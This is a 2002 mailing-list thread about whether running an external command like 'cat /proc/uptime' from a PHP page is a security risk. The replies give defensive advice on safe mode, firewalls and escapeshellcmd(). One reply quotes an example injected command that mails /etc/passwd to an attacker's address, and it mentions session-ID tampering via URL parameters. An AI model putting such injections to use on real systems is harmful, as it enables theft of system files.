Hi list, i wrote a PHP script which reads the information given in /proc/uptime by executing "cat /proc/uptime". <?PHP $prog = 'cat /proc/uptime'; while ($i<count($prog)) { . . . } ?> My question is: Is it safe to execute a external program when enetering a site? Or is it generally a security risk? Which severity would you give (1 - low, 10 - highest)? Ciao ;-) Robert Rottscholl - DE
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 At Mittwoch, 17. April 2002 13:06 Robert Rottscholl wrote:
My question is: Is it safe to execute a external program when enetering a site? Or is it generally a security risk? Which severity would you give (1 - low, 10 - highest)?
I would run PHP in "safe mode" and put the programs to be run into special scripts in the PHP "safe execution" directory. If the access is going to be restricted, SSL access should also be considered (if only to encrypt tht userid+password pairs). The Safety of the Server and web-directory structure is then the next element of the chain to be considered (for example, does the server allow CGI execution and such). Additionally the overall security of the server plays an important role (e.g. how secure is the access and the other applications on the server). Restrict access to certain IPs thru SuSEfirewall2 - if possible - and don't allow shell-access and/or altering the webpages by normal users - there you go. Pretty standard webserver stuff, if you do your homework, check logs regularly and invest some time into a simple IDS, technical security should reach 80 out of hundred. But why don't you connect through ssh for this simple problem? - -- Michael Zimmermann (Vegaa Safety and Security for Internet Services) <zim@vegaa.de> phone +49 89 6283 7632 hotline +49 163 823 1195 Key fingerprint = 1E47 7B99 A9D3 698D 7E35 9BB5 EF6B EEDB 696D 5811 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE8vVx972vu22ltWBERAvpkAJ9gv9HwL33NaHVFLjr2cybUsfbLgQCfVJf4 LxA4dEag7tnywFYJRDF+dn8= =i2rU -----END PGP SIGNATURE-----
Yuppa, Robert Rottscholl wrote: [...]
<?PHP $prog = 'cat /proc/uptime'; while ($i<count($prog)) { . . . } ?>
My question is: Is it safe to execute a external program when enetering a site? Or is it generally a security risk? Which severity would you give (1 - low, 10 - highest)?
Ciao ;-)
Robert Rottscholl - DE
It's very risky to use external tools in PHP (and other) scripts if you don't check the variables or if user input gets processed. I'd give it a solid "8" on your scale... For ex., if someone would somehow inject "mail </etc/passwd someone@somewhere.com" into the variable used in an exec() function without checking for shell escapes, the command would be executed and the passwd would be mailed to the attacker. To prevent these kinds of problems with special shell characters, the use of php's escapeshellcmd() function is highly recommended. It filters out any chars like /, \, > and more (look into the php manual, chapter XIV., Program Execution functions, for more info). What's more, unchecked and insecure opening, using and closing of file descriptors (e.g. for creating ascii output) may cause race conditions, which would enable attackers to redirect the input or output stream, thus overwriting critical data (shadow, anyone?) or "hijacking" the stream (not too trivial, tho). I have seen quite some php3/4 online shops who heavily rely on the <hidden> html tag to store session IDs for non cookie-based sites in order to hand the ID over to the next page and/or database. A simple "http://<url of webshop>?sessionid=foobar" often is enough to inject "foobar" instead of a real session-id in the variable, which may cause serious problems (just think of badly programmed online payment systems). Even some existing password schemes programmed in php3/4 are affected by this. Matt's script archive contains some of them... that's why it's a VERY bad idea to download and use public scripts without at least a basic security analysis. Btw., take a look at the chapter "Security" in the php manual, too. Boris Lorenz <bolo@lupa.de> ---
participants (3)
-
Boris Lorenz -
Michael Zimmermann -
Robert Rottscholl